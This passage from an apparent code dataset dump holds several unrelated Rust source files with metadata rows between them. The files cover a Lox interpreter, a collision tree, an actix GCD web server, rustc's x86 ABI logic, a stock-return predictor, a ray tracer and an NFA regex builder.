stack.push(w);
subtree.push(w);
}
}
//eprintln!("subtree with root {} is {:?}", st_root, subtree);
if subtree.len() > 2 {
subtrees.push((st_root, subtree));
}
}
//eprintln!("{:?}", subtrees);
subtrees
}
}
pub struct Bipgraph {
pub set_left: HashSet<usize>,
pub set_right: HashSet<usize>,
pub neighbors: HashMap<usize, Vec<usize>>,
}
impl Bipgraph {
pub fn new(g: &Graph, left: &[usize], right: &[usize]) -> Bipgraph {
let set_left: HashSet<usize> = left.iter().cloned().collect();
let set_right: HashSet<usize> = right.iter().cloned().collect();
let mut neighbors: HashMap<usize, Vec<usize>> = HashMap::new();
for &u in left {
neighbors.insert(u, g.neighbors[u].iter().filter(|&v| set_right.contains(v)).cloned().collect());
}
for &u in right {
neighbors.insert(u, g.neighbors[u].iter().filter(|&v| set_left.contains(v)).cloned().collect());
}
Bipgraph {
set_left,
set_right,
neighbors,
}
}
//fn neighbors(&self, u: usize) -> impl Iterator<Item = &usize> {
pub fn neighbors(&self, u: usize) -> &Vec<usize> {
//self.g.neighbors[u].iter().filter(|&v| self.is_left[u] ^ self.is_left[*v])
//self.g.neighbors[u].iter().filter(|&v| (self.is_left[u] && self.is_right[*v]) || (self.is_right[u] && self.is_left[*v])).collect()
&self.neighbors[&u]
}
}
#[derive(Debug)]
pub enum PickStrategy {
First,
Last,
Random
}
| true |
8b85b7ccdb4f6f8e5895fb875f560b2921ac3074
|
Rust
|
sria91-rlox/rlox-6
|
/interpreter/src/main.rs
|
UTF-8
| 3,140 | 3.21875 | 3 |
[] |
no_license
|
mod token;
mod scanner;
mod parser;
mod interpreter;
mod environment;
use std::{env, sync::Mutex};
use std::process;
use std::io;
use std::fs;
use std::sync::atomic::{AtomicBool, Ordering};
use interpreter::{Interpreter, RuntimeError};
use token::{Token, TokenType};
use scanner::Scanner;
use parser::{ParseError, Parser};
use lazy_static::lazy_static;
fn main() {
let mut lox = Lox{
had_error: false
};
lox.main();
}
static HAD_ERROR: AtomicBool = AtomicBool::new(false);
static HAD_RUNTIME_ERROR: AtomicBool = AtomicBool::new(false);
lazy_static! {
static ref INTERPRETER: Mutex<Interpreter> = Mutex::new(Interpreter::new());
}
struct Lox {
had_error: bool
}
impl Lox {
fn main(&mut self) {
let _args_: Vec<String> = env::args().collect();
self.run_prompt();
// if args.len() > 1 {
// println!("Usage: rlox [script]");
// process::exit(64);
// } else if args.len() == 1 {
// self.run_file(&args[0]).unwrap();
// } else {
// self.run_prompt();
// }
}
fn _run_file(&self, path: &str) -> io::Result<()> {
let bytes = fs::read(path).unwrap();
let string = std::str::from_utf8(&bytes).unwrap().to_owned();
self.run(string);
if HAD_ERROR.load(Ordering::Relaxed) == true {
process::exit(64);
}
if HAD_RUNTIME_ERROR.load(Ordering::Relaxed) == true {
process::exit(70);
}
Ok(())
}
fn run_prompt(&mut self) {
loop {
println!("> ");
let mut line = String::new();
io::stdin().read_line(&mut line).unwrap();
if line.len() == 0 {
break;
}
self.run(line);
self.had_error = false; // reset after every loop. if a user makes a mistake, it shouldn't kill their entire session.
}
}
fn run(&self, source: String) {
let mut scanner = Scanner::new(source);
let tokens: Vec<Token> = scanner.scan_tokens();
let mut parser = Parser::new(tokens);
let stmts = parser.parse();
if self.had_error {
return;
}
let mut i = INTERPRETER.lock().unwrap();
i.interpret(stmts);
}
fn error(line: u32, message: String) {
Lox::report(line, "".to_owned(), message);
}
fn parse_error(error: ParseError) {
let ParseError(token, message) = error;
if token.token_type == TokenType::Eof {
Lox::report(token.line, "at end".to_owned(), message)
} else {
Lox::report(token.line, format!("at, {}", token.lexeme), message)
}
}
fn runtime_error(error: RuntimeError) {
let RuntimeError(token, message) = error;
println!("{} \n[line {}]", message, token.line);
HAD_RUNTIME_ERROR.store(true, Ordering::Relaxed);
}
fn report(line: u32, where_: String, message: String) {
println!("[line {}] Error {}: {}", line, where_, message);
HAD_ERROR.store(true, Ordering::Relaxed);
}
}
| true |
9d7ae7eb167206752e9f220ac4b77625f27f6f74
|
Rust
|
Aedius/horfimbor
|
/server/src/domain.rs
|
UTF-8
| 701 | 3.03125 | 3 |
[
"MIT"
] |
permissive
|
use crate::error::InvalidResources;
use serde::{Deserialize, Serialize};
#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
pub struct Resources {
uranium: usize,
steel: usize,
gold: usize,
}
#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
pub struct Buildings {
house: usize,
mine: usize,
}
impl Resources {
pub fn new(uranium: usize, steel: usize) -> Result<Resources, InvalidResources> {
if uranium + steel > 100000 {
Err(InvalidResources)
} else {
Ok(Resources {
uranium,
steel,
gold: 100000 - uranium - steel,
})
}
}
}
| true |
b7738b30720766392224ed12eb234afd52716e0c
|
Rust
|
storyfeet/collide_tree
|
/src/lib.rs
|
UTF-8
| 2,902 | 3.28125 | 3 |
[] |
no_license
|
use std::fmt::Debug;
use std::ops::*;
pub mod boxes;
#[cfg(test)]
mod test;
pub trait BoundBox: Sized + Clone {
///Split the box in half somehow, normally this should vary in direction
fn split(&self) -> (Self, Self);
///Test if one box collides with another.
fn hits(&self, b: &Self) -> bool;
}
pub trait Located {
type ID;
type Box: BoundBox;
fn id(&self) -> Self::ID;
fn bounds(&self) -> Self::Box;
}
pub struct LocalTree<L: Located + Debug> {
bound: L::Box,
top: Vec<L>,
children: Option<Box<(LocalTree<L>, LocalTree<L>)>>,
}
impl<L: Located + Debug> LocalTree<L> {
pub fn new(bound: L::Box) -> Self {
LocalTree {
bound,
top: Vec::new(),
children: None,
}
}
pub fn add_item(&mut self, item: L, v: &mut Vec<(L::ID, L::ID)>) {
self.grow_children();
let ib = item.bounds();
for t in &self.top {
if t.bounds().hits(&ib) {
v.push((t.id(), item.id()));
}
}
match &mut self.children {
Some(b) => {
let (l, r) = b.deref_mut();
match (l.bound.hits(&ib), r.bound.hits(&ib)) {
(true, false) => l.add_item(item, v),
(false, true) => r.add_item(item, v),
_ => {
l.check_hits(&item, v);
r.check_hits(&item, v);
self.top.push(item);
}
}
}
None => self.top.push(item),
}
}
pub fn check_hits(&self, item: &L, v: &mut Vec<(L::ID, L::ID)>) {
let ib = item.bounds();
for t in &self.top {
if t.bounds().hits(&ib) {
v.push((t.id(), item.id()));
}
}
if let Some(b) = &self.children {
let (l, r) = b.deref();
if l.bound.hits(&ib) {
l.check_hits(item, v);
}
if r.bound.hits(&ib) {
r.check_hits(item, v);
}
}
}
pub fn grow_children(&mut self) {
if let Some(_) = self.children {
return;
}
if self.top.len() < 8 {
return;
}
let (l, r) = self.bound.split();
let (mut l, mut r) = (Self::new(l), Self::new(r));
let mut newtop = Vec::new();
std::mem::swap(&mut newtop, &mut self.top);
for v in newtop {
let ib = v.bounds();
match (l.bound.hits(&ib), r.bound.hits(&ib)) {
(true, false) => l.top.push(v),
(false, true) => r.top.push(v),
_ => self.top.push(v),
}
}
self.children = Some(Box::new((l, r)));
}
}
#[cfg(test)]
mod tests {
#[test]
fn it_works() {
assert_eq!(2 + 2, 4);
}
}
| true |
fe28086fff462b5078491e616c5d141452aa0cf5
|
Rust
|
oil-lang/oil-rs
|
/shared/src/asset.rs
|
UTF-8
| 2,182 | 3.1875 | 3 |
[
"MIT"
] |
permissive
|
use std::fmt::{self, Debug};
use std::path::Path;
use deps::Constructor;
use resource::{BasicResourceManager, ResourceId};
#[derive(Debug, Clone)]
pub struct FontData;
// TODO handle shared images somehow
// even in a disgusting way, but something !
// The opengl backend will do it by using the same texture id.
#[derive(Clone)]
pub struct ImageData {
pub img: ResourceId,
pub offset_x: f32,
pub offset_y: f32,
pub width: f32,
pub height: f32,
}
/// Necessary because DynamicImage does not implement the trait Debug.
impl Debug for ImageData
{
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
try!(write!(f, "ImageData {{ "));
try!(write!(f, "offset_x {:?}, ", self.offset_x));
try!(write!(f, "offset_y {:?}, ", self.offset_y));
try!(write!(f, "width {:?}, ", self.width));
try!(write!(f, "height {:?} ", self.height));
write!(f, "}}")
}
}
impl ImageData {
pub fn new<R>(
image_ctor: &Constructor,
resource_manager: &mut R)
-> ImageData
where R: BasicResourceManager
{
if let Constructor::Image(ref path, width, height, offset_x, offset_y)
= *image_ctor
{
let image = resource_manager.get_texture_id(&Path::new(path));
let (iw, ih) = resource_manager.get_image_dimensions(image);
let w = width.unwrap_or(iw as f32);
let h = height.unwrap_or(ih as f32);
let x = offset_x.unwrap_or(0f32);
let y = offset_y.unwrap_or(0f32);
ImageData {
img: image,
offset_x: x,
offset_y: y,
width: w,
height: h,
}
} else {
panic!("Wrong constructor passed. Expected Constructor::Image.");
}
}
}
impl FontData {
pub fn new(font_ctor: &Constructor) -> FontData {
if let Constructor::Font(ref path, width, height) = *font_ctor {
// TODO: see freetype-rs or something similar
FontData
} else {
panic!("Wrong constructor passed. Expected Constructor::Font.");
}
}
}
| true |
7fb07a318ae4cad2c45d085f90202e980249c2d2
|
Rust
|
timmyjose-study/programming-rust-2nd-edition
|
/chapter2/actix-gcd/src/main.rs
|
UTF-8
| 1,361 | 3.15625 | 3 |
[] |
no_license
|
use actix_gcd;
use actix_web::{web, App, HttpResponse, HttpServer};
use serde::Deserialize;
#[derive(Deserialize)]
struct GcdParameters {
m: u64,
n: u64,
}
fn main() {
let server = HttpServer::new(|| {
App::new()
.route("/", web::get().to(get_index))
.route("/gcd", web::post().to(post_gcd))
});
println!("Serving on localhost:3000...");
server
.bind("127.0.0.1:3000")
.expect("error binding on localhost:3000")
.run()
.expect("error while running server");
}
fn get_index() -> HttpResponse {
HttpResponse::Ok().content_type("text/html").body(
r#"
<title>GCD calculator</title>
<form action="/gcd" method="post">
<input type="text" name="m"/>
<input type="text" name="n"/>
<button type="submit">Compute GCD</button>
</form>
"#,
)
}
fn post_gcd(form: web::Form<GcdParameters>) -> HttpResponse {
if form.m == 0 || form.n == 0 {
return HttpResponse::BadRequest()
.content_type("text/html")
.body("GCD cannot be calculated for 0 and 0");
}
let response = format!(
"The GCD of {} and {} is <b>{}</b>\n",
form.m,
form.n,
actix_gcd::gcd(form.m, form.n)
);
HttpResponse::Ok().content_type("text/html").body(response)
}
| true |
e6d4f09a2adf6512b42df3809fd56cc9c29f5de3
|
Rust
|
manuel-rhdt/mlayout
|
/src/mathmlparser/error.rs
|
UTF-8
| 3,525 | 2.984375 | 3 |
[
"MIT"
] |
permissive
|
use std;
use std::fmt;
use std::io::prelude::*;
#[cfg(feature = "mathml_parser")]
use quick_xml::{self, XmlReader};
pub type Result<T> = std::result::Result<T, ParsingError>;
#[derive(Debug)]
pub struct ParsingError {
pub position: Option<usize>,
pub error_type: ErrorType,
}
impl ParsingError {
#[cfg(feature = "mathml_parser")]
pub fn from_string<B: BufRead, S: ToString>(parser: &XmlReader<B>, string: S) -> ParsingError {
ParsingError {
position: Some(parser.buffer_position()),
error_type: ErrorType::OtherError(string.to_string()),
}
}
#[cfg(feature = "mathml_parser")]
pub fn of_type<B: BufRead>(parser: &XmlReader<B>, err_type: ErrorType) -> ParsingError {
ParsingError {
position: Some(parser.buffer_position()),
error_type: err_type,
}
}
}
#[derive(Debug)]
pub enum ErrorType {
UnknownElement(String),
UnexpectedEndOfInput,
WrongEndElement(String),
OtherError(String),
Utf8Error(std::str::Utf8Error),
#[cfg(feature = "mathml_parser")]
XmlError(quick_xml::error::Error),
}
impl fmt::Display for ParsingError {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
match self.error_type {
ErrorType::Utf8Error(err) => write!(f, "{}", err),
ErrorType::UnknownElement(ref name) => write!(f, "Unknown Element: \"{}\"", name),
ErrorType::UnexpectedEndOfInput => write!(f, "Unexpected end of input."),
ErrorType::WrongEndElement(ref name) => write!(
f,
"Unexpected end element \"<{}>\" without corresponding start element.",
name
),
ErrorType::OtherError(ref string) => write!(f, "Error: {}", string),
#[cfg(feature = "mathml_parser")]
ErrorType::XmlError(ref error) => write!(f, "XML error: {}", error),
}
}
}
impl std::error::Error for ParsingError {
fn cause(&self) -> Option<&dyn std::error::Error> {
match self.error_type {
#[cfg(feature = "mathml_parser")]
ErrorType::XmlError(ref error) => Some(error),
_ => None,
}
}
}
impl<'a> ::std::convert::From<&'a str> for ParsingError {
fn from(string: &str) -> ParsingError {
ParsingError {
position: None,
error_type: ErrorType::OtherError(string.to_owned()),
}
}
}
impl ::std::convert::From<String> for ParsingError {
fn from(string: String) -> ParsingError {
ParsingError {
position: None,
error_type: ErrorType::OtherError(string),
}
}
}
#[cfg(feature = "mathml_parser")]
impl ::std::convert::From<quick_xml::error::Error> for ParsingError {
fn from(error: quick_xml::error::Error) -> ParsingError {
ParsingError {
position: None,
error_type: ErrorType::XmlError(error),
}
}
}
#[cfg(feature = "mathml_parser")]
impl ::std::convert::From<(quick_xml::error::Error, usize)> for ParsingError {
fn from((error, position): (quick_xml::error::Error, usize)) -> ParsingError {
ParsingError {
position: Some(position),
error_type: ErrorType::XmlError(error),
}
}
}
impl ::std::convert::From<std::str::Utf8Error> for ParsingError {
fn from(error: std::str::Utf8Error) -> ParsingError {
ParsingError {
position: None,
error_type: ErrorType::Utf8Error(error),
}
}
}
| true |
ef2972d2e3ce878ba2f2053b15d2a9f15c537762
|
Rust
|
xzfc/ufcs.rs
|
/src/lib.rs
|
UTF-8
| 137 | 2.59375 | 3 |
[
"MIT",
"Unlicense"
] |
permissive
|
#![no_std]
pub trait Pipe: Sized {
fn pipe<R, F: FnOnce(Self) -> R>(self, f: F) -> R {
f(self)
}
}
impl<T> Pipe for T {}
| true |
057a71d35ea1d47a854539e642ed29f3cef68b4a
|
Rust
|
jamesrweb/rust-coursework
|
/05 - Tuples and Arrays/01 - Tuples/main.rs
|
UTF-8
| 520 | 3.265625 | 3 |
[] |
no_license
|
fn main() {
let tuple_inferred = (220, true, 8.5);
println!("{:?}", tuple_inferred);
println!("Items by key:");
println!("First item: {}", tuple_inferred.0);
println!("Second item: {}", tuple_inferred.1);
println!("Third item: {}", tuple_inferred.2);
let tuple_typed: (i32, bool, f64) = (123, false, 22.1);
let (first, second, third) = tuple_typed;
println!("Items by destructuring:");
println!("First item: {}", first);
println!("Second item: {}", second);
println!("Third item: {}", third);
}
| true |
75b9f37158ecd8a6cfef7e0cd757376642fc4b4d
|
Rust
|
IThawk/rust-project
|
/rust-master/src/librustc_target/abi/call/x86.rs
|
UTF-8
| 4,540 | 2.640625 | 3 |
[
"MIT",
"LicenseRef-scancode-other-permissive",
"Apache-2.0",
"BSD-3-Clause",
"BSD-2-Clause",
"NCSA"
] |
permissive
|
use crate::abi::call::{ArgAttribute, FnType, PassMode, Reg, RegKind};
use crate::abi::{self, HasDataLayout, LayoutOf, TyLayout, TyLayoutMethods};
use crate::spec::HasTargetSpec;
#[derive(PartialEq)]
pub enum Flavor {
General,
Fastcall
}
fn is_single_fp_element<'a, Ty, C>(cx: &C, layout: TyLayout<'a, Ty>) -> bool
where Ty: TyLayoutMethods<'a, C> + Copy,
C: LayoutOf<Ty = Ty, TyLayout = TyLayout<'a, Ty>> + HasDataLayout
{
match layout.abi {
abi::Abi::Scalar(ref scalar) => scalar.value.is_float(),
abi::Abi::Aggregate { .. } => {
if layout.fields.count() == 1 && layout.fields.offset(0).bytes() == 0 {
is_single_fp_element(cx, layout.field(cx, 0))
} else {
false
}
}
_ => false
}
}
pub fn compute_abi_info<'a, Ty, C>(cx: &C, fty: &mut FnType<'a, Ty>, flavor: Flavor)
where Ty: TyLayoutMethods<'a, C> + Copy,
C: LayoutOf<Ty = Ty, TyLayout = TyLayout<'a, Ty>> + HasDataLayout + HasTargetSpec
{
if !fty.ret.is_ignore() {
if fty.ret.layout.is_aggregate() {
// Returning a structure. Most often, this will use
// a hidden first argument. On some platforms, though,
// small structs are returned as integers.
//
// Some links:
// http://www.angelcode.com/dev/callconv/callconv.html
// Clang's ABI handling is in lib/CodeGen/TargetInfo.cpp
let t = cx.target_spec();
if t.options.abi_return_struct_as_int {
// According to Clang, everyone but MSVC returns single-element
// float aggregates directly in a floating-point register.
if !t.options.is_like_msvc && is_single_fp_element(cx, fty.ret.layout) {
match fty.ret.layout.size.bytes() {
4 => fty.ret.cast_to(Reg::f32()),
8 => fty.ret.cast_to(Reg::f64()),
_ => fty.ret.make_indirect()
}
} else {
match fty.ret.layout.size.bytes() {
1 => fty.ret.cast_to(Reg::i8()),
2 => fty.ret.cast_to(Reg::i16()),
4 => fty.ret.cast_to(Reg::i32()),
8 => fty.ret.cast_to(Reg::i64()),
_ => fty.ret.make_indirect()
}
}
} else {
fty.ret.make_indirect();
}
} else {
fty.ret.extend_integer_width_to(32);
}
}
for arg in &mut fty.args {
if arg.is_ignore() { continue; }
if arg.layout.is_aggregate() {
arg.make_indirect_byval();
} else {
arg.extend_integer_width_to(32);
}
}
if flavor == Flavor::Fastcall {
// Mark arguments as InReg like clang does it,
// so our fastcall is compatible with C/C++ fastcall.
// Clang reference: lib/CodeGen/TargetInfo.cpp
// See X86_32ABIInfo::shouldPrimitiveUseInReg(), X86_32ABIInfo::updateFreeRegs()
// IsSoftFloatABI is only set to true on ARM platforms,
// which in turn can't be x86?
let mut free_regs = 2;
for arg in &mut fty.args {
let attrs = match arg.mode {
PassMode::Ignore |
PassMode::Indirect(_, None) => continue,
PassMode::Direct(ref mut attrs) => attrs,
PassMode::Pair(..) |
PassMode::Indirect(_, Some(_)) |
PassMode::Cast(_) => {
unreachable!("x86 shouldn't be passing arguments by {:?}", arg.mode)
}
};
// At this point we know this must be a primitive of sorts.
let unit = arg.layout.homogeneous_aggregate(cx).unit().unwrap();
assert_eq!(unit.size, arg.layout.size);
if unit.kind == RegKind::Float {
continue;
}
let size_in_regs = (arg.layout.size.bits() + 31) / 32;
if size_in_regs == 0 {
continue;
}
if size_in_regs > free_regs {
break;
}
free_regs -= size_in_regs;
if arg.layout.size.bits() <= 32 && unit.kind == RegKind::Integer {
attrs.set(ArgAttribute::InReg);
}
if free_regs == 0 {
break;
}
}
}
}
| true |
1f224825e7ec62d3a7d79c30570a16399902c26d
|
Rust
|
hn3000/greatest-predictor
|
/src/lib.rs
|
UTF-8
| 8,139 | 2.515625 | 3 |
[] |
no_license
|
use chrono::{Datelike, NaiveDate};
use serde::{Deserialize,Serialize};
use std::iter::Peekable;
#[derive(Debug, Deserialize)]
pub struct AllocationRecord {
#[serde(rename = "DATE")]
pub date: NaiveDate,
#[serde(rename = "NCBEILQ027S_BCNSDODNS_CMDEBT_FGSDODNS_SLGSDODNS_FBCELLQ027S_DODFFSWCMI")]
pub allocation: f64,
}
pub async fn fetch_stock_allocation() -> Result<Vec<AllocationRecord>, anyhow::Error> {
let fut = reqwest::get("https://fred.stlouisfed.org/graph/fredgraph.csv?id=NCBEILQ027S_BCNSDODNS_CMDEBT_FGSDODNS_SLGSDODNS_FBCELLQ027S_DODFFSWCMI&cosd=1951-10-01&coed=2100-01-01&fml=%28%28a%2Bf%29%2F1000%29%2F%28%28%28a%2Bf%29%2F1000%29%2Bb%2Bc%2Bd%2Be%2Bg%29");
let result = fut.await?;
let csv = result.text().await?;
//println!("{}", csv);
let mut xx = csv::Reader::from_reader(csv.as_bytes());
let result = xx
.deserialize()
.collect::<Result<Vec<AllocationRecord>, _>>()?;
Ok(result)
}
#[derive(Debug, Deserialize)]
pub struct Snp500Record {
#[serde(rename = "Date")]
pub date: NaiveDate,
#[serde(rename = "Adj Close")]
pub closing_price: f64,
}
/*
static yahooUrl = 'https://finance.yahoo.com/quote/%5ESP500TR/history?p=%5ESP500TR';
static dailyCsvUrl = 'https://query1.finance.yahoo.com/v7/finance/download/%5ESP500TR?period1=${lastYear}&period2=2500000000&interval=1d&events=history&crumb=';
*/
#[derive(Clone,Copy)]
pub enum Snp500Symbol {
SNP500,
SNP500TR
}
impl Snp500Symbol {
pub fn as_str(self) -> &'static str {
match self {
Snp500Symbol::SNP500 => "%5EGSPC",
Snp500Symbol::SNP500TR => "%5ESP500TR",
}
}
}
pub async fn fetch_snp500_data(symbol: Snp500Symbol) -> Result<Vec<Snp500Record>, anyhow::Error> {
#[cfg(any())]
{
let pageurl = format!("https://finance.yahoo.com/quote/{}/history", symbol.as_str());
let page = reqwest::get(pageurl)
.await?
.text()
.await?;
let re = regex::Regex::new(r#""CrumbStore":\{"crumb":"([^"]*)"\}"#)?;
let crumb = re
.captures(&page)
.ok_or_else(|| anyhow!("crumbled cookie: no crumb"))?
.get(1)
.ok_or_else(|| anyhow!("crumbled cookie: no crumb, either"))?
.as_str()
.replace(r"\u002F", "/");
dbg!(&crumb);
let csvurl = format!("https://query1.finance.yahoo.com/v7/finance/download/{0}?period1=${lastYear}&period2=2500000000&interval=1d&events=history&crumb={1}", &symbol.as_str(), &crumb);
}
let csvurl = format!("https://query1.finance.yahoo.com/v7/finance/download/{0}?period1=-576032400&period2=4102441200&interval=1d&events=history&includeAdjustedClose=true", symbol.as_str());
let csvtext = reqwest::get(&csvurl)
.await?
.text()
.await?;
//dbg!(&csvtext);
let mut csvrdr = csv::Reader::from_reader(csvtext.as_bytes());
let result = csvrdr
.deserialize()
.collect::<Result<Vec<Snp500Record>, _>>()?;
Ok(result)
}
#[derive(Debug, Deserialize)]
pub struct CombinedRecord {
#[serde(rename = "Date")]
pub date: NaiveDate,
#[serde(rename = "StockAllocation")]
pub stock_allocation: f64,
#[serde(rename = "Snp500Price")]
pub snp500_price: f64,
#[serde(rename = "Snp500Return")]
pub snp500_return: Option<f64>,
}
#[derive(Debug, Deserialize, Serialize)]
pub struct PredictionRecord {
#[serde(rename = "Date")]
pub date: NaiveDate,
#[serde(rename = "Snp500ReturnPredicted")]
pub snp500_return_predicted: f64,
#[serde(rename = "Snp500PricePredicted")]
pub snp500_price_predicted: f64,
#[serde(rename = "Snp500PriceActual")]
pub snp500_price_actual: Option<f64>,
}
pub fn allocation_to_return(allocation: f64) -> f64 {
// taken from the article
// allocation is 15% - 55%
// return is -6% - 25%
let f = (allocation - 0.15) / (0.55 - 0.15);
let result = 0.25 - f * (0.25 - -0.06);
result
}
pub fn price_now_to_price_in_10y(price_now: f64, predicted_return: f64) -> f64 {
price_now * (1.0+predicted_return).powi(10)
}
pub fn combined_records(allocations: &[AllocationRecord], snp500: &[Snp500Record]) -> Vec<CombinedRecord> {
let allocation_iter = allocations.iter();
let mut snp_iter = snp500.iter().peekable();
if let Some(snpfirst) = snp_iter.peek() {
let allocations_with_snp = allocation_iter.skip_while(|x| x.date < snpfirst.date);
let combined_records = allocations_with_snp.filter_map(|x| {
let mut snp_iter = snp500.iter().peekable();
loop {
if let Some(snp_current) = snp_iter.peek() {
if snp_current.date < x.date {
let _ = snp_iter.next();
} else {
if let Some(date_new) = x.date.with_year(x.date.year() + 10) {
let prediction = CombinedRecord {
date: date_new,
stock_allocation: x.allocation,
snp500_price: snp_current.closing_price,
snp500_return: None,
};
break Some(prediction);
} else {
break None
}
}
} else {
break None;
}
}
});
combined_records.collect()
} else {
Vec::new()
}
}
pub fn prediction_records(allocations: &[AllocationRecord], snp500: &[Snp500Record]) -> Vec<PredictionRecord> {
if let Some(snpfirst) = snp500.first() {
let allocations_with_snp = allocations.iter().skip_while(|x| x.date < snpfirst.date);
let mut snp_iter = snp500.iter().zip(snp500.iter().skip(1)).peekable();
let mut snp_future_iter = snp500.iter().zip(snp500.iter().skip(1)).peekable();
let prediction_records = allocations_with_snp.filter_map(|allocation_rec| {
loop {
snp_iter.mutating_skip_while(|(_, next)| next.date <= allocation_rec.date);
if let Some((snp_current, _)) = snp_iter.next() {
let snp500_return_predicted = allocation_to_return(allocation_rec.allocation);
let snp500_price_predicted = price_now_to_price_in_10y(snp_current.closing_price, snp500_return_predicted);
if let Some(date_new) = allocation_rec.date.with_year(allocation_rec.date.year() + 10) {
let snp500_price_actual = {
snp_future_iter.mutating_skip_while(|(_, next)| next.date <= date_new);
snp_future_iter
.next()
.map(|(snp_current, _)| snp_current.closing_price)
};
let prediction = PredictionRecord {
date: date_new,
snp500_return_predicted,
snp500_price_predicted,
snp500_price_actual,
};
break Some(prediction);
} else {
break None
}
} else {
break None;
}
}
});
prediction_records.collect()
} else {
Vec::new()
}
}
trait IterSkipExt: Iterator {
fn mutating_skip_while<F>(&mut self, pred: F)
where F: FnMut(&Self::Item) -> bool;
}
impl<I: Iterator> IterSkipExt for Peekable<I> {
fn mutating_skip_while<F>(&mut self, mut pred: F)
where F: FnMut(&Self::Item) -> bool,
{
loop {
if let Some(x) = self.peek() {
if pred(x) {
let _ = self.next();
} else {
break;
}
} else {
break;
}
}
}
}
| true |
f240b72cc965b7baae51e997cceb8abc143d359a
|
Rust
|
suyanlongfamily/rust_study
|
/Study/arry.rs
|
UTF-8
| 287 | 3.796875 | 4 |
[] |
no_license
|
fn main() {
//定义数组
let mut arrtobj:[i32;3] = [0;3];
arrtobj[1] = 1;
arrtobj[2] = 2;
assert_eq!([1,2],&arrtobj[1..]);//对数组的引用。
//数组的引用才有迭代器。
for pat in &arrtobj {
println!("{}---",pat);
}
}
| true |
5593f28e280a311c07d0c40eda53b79b4ea6f841
|
Rust
|
elpnt/rust-rtnw
|
/src/translate.rs
|
UTF-8
| 3,920 | 3.015625 | 3 |
[] |
no_license
|
use crate::aabb::AABB;
use crate::hitable::{HitRecord, Hitable};
use crate::ray::Ray;
use crate::vec3::Vec3;
use std::f32::consts::PI;
pub struct Translate<H: Hitable> {
pub hitable: H,
pub offset: Vec3,
}
impl<H: Hitable> Translate<H> {
pub fn new(hitable: H, offset: Vec3) -> Self {
Translate { hitable, offset }
}
}
impl<H: Hitable> Hitable for Translate<H> {
fn hit(&self, r: &Ray, t_min: f32, t_max: f32) -> Option<HitRecord> {
let moved_r = Ray::new(r.origin - self.offset, r.direction, r.time);
if let Some(mut rec) = self.hitable.hit(&moved_r, t_min, t_max) {
rec.p += self.offset;
Some(rec)
} else {
None
}
}
fn bounding_box(&self, t0: f32, t1: f32) -> Option<AABB> {
if let Some(mut bbox) = self.hitable.bounding_box(t0, t1) {
bbox.min += self.offset;
bbox.max += self.offset;
Some(bbox)
} else {
None
}
}
}
pub struct Rotate<H: Hitable> {
pub hitable: H,
pub sin_theta: f32,
pub cos_theta: f32,
pub bbox: Option<AABB>,
}
impl<H: Hitable> Rotate<H> {
pub fn new(hitable: H, angle: f32) -> Self {
let radians: f32 = (PI / 180.0) * angle;
let sin_theta: f32 = radians.sin();
let cos_theta: f32 = radians.cos();
let bbox = hitable.bounding_box(0.0, 1.0).unwrap();
let mut min = Vec3::new(std::f32::MAX, std::f32::MAX, std::f32::MAX);
let mut max = Vec3::new(-std::f32::MAX, -std::f32::MAX, -std::f32::MAX);
for i in 0..2 {
for j in 0..2 {
for k in 0..2 {
let x: f32 = i as f32 * bbox.max.x + (1.0 - i as f32) * bbox.min.x;
let y: f32 = j as f32 * bbox.max.y + (1.0 - j as f32) * bbox.min.y;
let z: f32 = k as f32 * bbox.max.z + (1.0 - k as f32) * bbox.min.z;
let new_x: f32 = cos_theta * x + sin_theta * z;
let new_z: f32 = -sin_theta * x + cos_theta * z;
let tester = Vec3::new(new_x, y, new_z);
for c in 0..3 {
if tester[c] > max[c] {
max[c] = tester[c];
}
if tester[c] < min[c] {
min[c] = tester[c]
}
}
}
}
}
let bbox = AABB::new(min, max);
Rotate {
hitable,
sin_theta,
cos_theta,
bbox: Some(bbox),
}
}
}
impl<H: Hitable> Hitable for Rotate<H> {
fn hit(&self, r: &Ray, t_min: f32, t_max: f32) -> Option<HitRecord> {
let mut origin: Vec3 = r.origin;
let mut direction: Vec3 = r.direction;
origin.x = self.cos_theta * r.origin.x - self.sin_theta * r.origin.z;
origin.z = self.sin_theta * r.origin.x + self.cos_theta * r.origin.z;
direction.x = self.cos_theta * r.direction.x - self.sin_theta * r.direction.z;
direction.z = self.sin_theta * r.direction.x + self.cos_theta * r.direction.z;
let rotated_r = Ray::new(origin, direction, r.time);
if let Some(mut rec) = self.hitable.hit(&rotated_r, t_min, t_max) {
let mut p: Vec3 = rec.p;
let mut normal: Vec3 = rec.normal;
p.x = self.cos_theta * rec.p.x - self.sin_theta * rec.p.z;
p.z = self.sin_theta * rec.p.x + self.sin_theta * rec.p.z;
normal.x = self.cos_theta * rec.normal.x - self.sin_theta * rec.normal.z;
normal.z = self.sin_theta * rec.normal.z + self.cos_theta * rec.normal.z;
rec.p = p;
rec.normal = normal;
Some(rec)
} else {
None
}
}
fn bounding_box(&self, t0: f32, t1: f32) -> Option<AABB> {
self.bbox
}
}
| true |
a9f618c512704ade4eb53f58df6d37a0aba1f41d
|
Rust
|
Mokosha/Regex-Rust
|
/src/nfa.rs
|
UTF-8
| 7,850 | 3.34375 | 3 |
[
"MIT"
] |
permissive
|
use std::collections::HashSet;
use expr::Expression;
use expr::Character;
#[derive(Debug, PartialEq, Clone)]
pub enum ExpectedChar {
Specific(char),
Wildcard,
Any(Vec<Character>),
None(Vec<Character>)
}
#[derive(Debug, PartialEq, Clone)]
pub enum State {
Success,
// In order to transition to the state indexed, it needs a character
NeedsCharacter(ExpectedChar, usize),
// Branches into two states
Branch(usize, usize)
}
impl State {
fn branch(id1: usize, id2: usize) -> State {
State::Branch(id1, id2)
}
fn offset(self, off: usize) -> State {
match self {
State::Success => self,
State::NeedsCharacter(c, id) => State::NeedsCharacter(c, id + off),
State::Branch(id1, id2) => State::Branch(id1 + off, id2 + off)
}
}
// Only performs the offset if the states are greater
// than or equal to from
fn offset_from(self, from: usize, off: usize) -> State {
match self {
State::Success => self,
State::NeedsCharacter(c, id) => {
if id >= from {
State::NeedsCharacter(c, id + off)
} else {
State::NeedsCharacter(c, id)
}
},
State::Branch(id1, id2) => {
let n1 = if id1 >= from { id1 + off } else { id1 };
let n2 = if id2 >= from { id2 + off } else { id2 };
